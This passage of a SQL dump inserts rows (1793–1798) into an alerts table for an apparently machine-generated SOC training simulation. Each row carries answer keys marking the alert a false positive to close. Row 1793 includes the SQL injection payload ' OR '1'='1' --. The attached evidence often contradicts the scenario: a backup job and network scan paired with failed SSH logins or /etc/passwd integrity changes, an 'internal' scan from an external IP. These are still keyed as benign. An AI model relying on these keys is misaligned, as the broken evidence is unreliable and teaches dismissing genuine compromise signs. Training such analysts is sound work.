--apply-updates\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T06:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.5\\\",\\\"dst_ip\\\":\\\"192.168.4.6\\\",\\\"username\\\":\\\"update_admin\\\",\\\"hostname\\\":\\\"update_server\\\",\\\"command_line\\\":\\\"update_tool --apply-updates\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T06:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.5\\\",\\\"dst_ip\\\":\\\"192.168.4.6\\\",\\\"username\\\":\\\"update_admin\\\",\\\"hostname\\\":\\\"update_server\\\",\\\"command_line\\\":\\\"update_tool --apply-updates\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1793, 'Routine IT Vulnerability Scans Trigger Web Request Alert', 'low', 'Wazuh', 'A routine vulnerability scan from an internal IP triggered an alert due to multiple web requests containing harmless test payloads. The scan is part of scheduled security assessments.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"10.0.0.5\",\"username\":\"svc_scan_user\",\"hostname\":\"scanner.internal\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":\"\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Common test payload for SQL injection detection.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Routine vulnerability scanning using test payloads triggered alerts.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.305Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_scan_user\\\",\\\"hostname\\\":\\\"scanner.internal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.305Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_scan_user\\\",\\\"hostname\\\":\\\"scanner.internal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.305Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_scan_user\\\",\\\"hostname\\\":\\\"scanner.internal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.305Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_scan_user\\\",\\\"hostname\\\":\\\"scanner.internal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.305Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_scan_user\\\",\\\"hostname\\\":\\\"scanner.internal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1794, 'Authorized Administrative Backup Process Detected as Suspicious Execution', 'low', 'Splunk', 'An authorized backup script executed with elevated privileges was flagged due to unusual command line patterns. The script is part of the routine data backup process.', 'Execution', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"request_body\":\"\",\"command_line\":\"/usr/local/bin/backup.sh --full --encrypt\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the backup server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/local/bin/backup.sh --full --encrypt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized backup script execution.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The execution of authorized backup scripts with encryption options is routine.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.306Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"/usr/local/bin/backup.sh --full --encrypt\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.306Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"/usr/local/bin/backup.sh --full --encrypt\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.306Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"/usr/local/bin/backup.sh --full --encrypt\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.306Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"/usr/local/bin/backup.sh --full --encrypt\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.306Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"/usr/local/bin/backup.sh --full --encrypt\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1795, 'Misconfigured Legacy Application Generates Network Connection Alerts', 'medium', 'Elastic SIEM', 'A legacy application attempting to connect to deprecated ports triggered security alerts. The application is known to operate on outdated protocols.', 'Network Connection', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:20:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.150\",\"dst_ip\":\"10.0.0.8\",\"username\":\"legacy_app_user\",\"hostname\":\"legacy-app-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address for legacy application server.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_connection\",\"analysis_notes\":\"Legacy application is known to attempt connections using outdated protocols and ports.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.308Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:20:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"legacy_app_user\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.308Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:20:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"legacy_app_user\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.308Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:20:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"legacy_app_user\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.308Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:20:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"legacy_app_user\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.308Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:20:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"legacy_app_user\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1796, 'Benign System Health Check Mistaken for Lateral Movement', 'low', 'Azure Sentinel', 'Scheduled system health checks using internal credentials were flagged as potential lateral movement due to unusual account usage patterns.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:55:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.50\",\"dst_ip\":\"10.0.0.60\",\"username\":\"health_check_user\",\"hostname\":\"health-monitor\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for system health monitoring.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"health_check_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"User account designated for system health checks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Routine health checks by designated user account were incorrectly flagged.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.309Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:55:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"health_check_user\\\",\\\"hostname\\\":\\\"health-monitor\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.309Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:55:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"health_check_user\\\",\\\"hostname\\\":\\\"health-monitor\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.309Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:55:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"health_check_user\\\",\\\"hostname\\\":\\\"health-monitor\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.309Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:55:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"health_check_user\\\",\\\"hostname\\\":\\\"health-monitor\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.309Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:55:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"health_check_user\\\",\\\"hostname\\\":\\\"health-monitor\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1797, 'Network Reconnaissance Activity Mistaken for Attack', 'medium', 'Wazuh', 'Internal network reconnaissance scans detected as potential attack activity. The scans are part of regularly scheduled security assessments.', 'Reconnaissance', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.30\",\"dst_ip\":\"10.0.0.40\",\"username\":\"net_recon_user\",\"hostname\":\"network-scanner\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of network scanner used for reconnaissance.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"reconnaissance\",\"analysis_notes\":\"Regularly scheduled network reconnaissance scans were misinterpreted as attack activity.\"}', 'Intermediate', 'SIEM', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.311Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"net_recon_user\\\",\\\"hostname\\\":\\\"network-scanner\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.311Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"net_recon_user\\\",\\\"hostname\\\":\\\"network-scanner\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.311Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"net_recon_user\\\",\\\"hostname\\\":\\\"network-scanner\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.311Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"net_recon_user\\\",\\\"hostname\\\":\\\"network-scanner\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.311Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"net_recon_user\\\",\\\"hostname\\\":\\\"network-scanner\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1798, 'Routine System Health Check Detected as Malware', 'low', 'Splunk', 'A system health check script execution was mistakenly identified as malicious activity. The script ran a series of diagnostic tests on internal systems.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.20\",\"username\":\"it_admin\",\"hostname\":\"healthcheck-server\",\"command_line\":\"python3 /scripts/system_health_check.py\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"python3 /scripts/system_health_check.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a legitimate internal diagnostic tool.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in routine operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command line matches known diagnostic scripts used by IT for routine health checks.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.312Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"healthcheck-server\\\",\\\"command_line\\\":\\\"python3 /scripts/system_health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.312Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"healthcheck-server\\\",\\\"command_line\\\":\\\"python3 /scripts/system_health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.312Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"healthcheck-server\\\",\\\"command_line\\\":\\\"python3 /scripts/system_health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.312Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 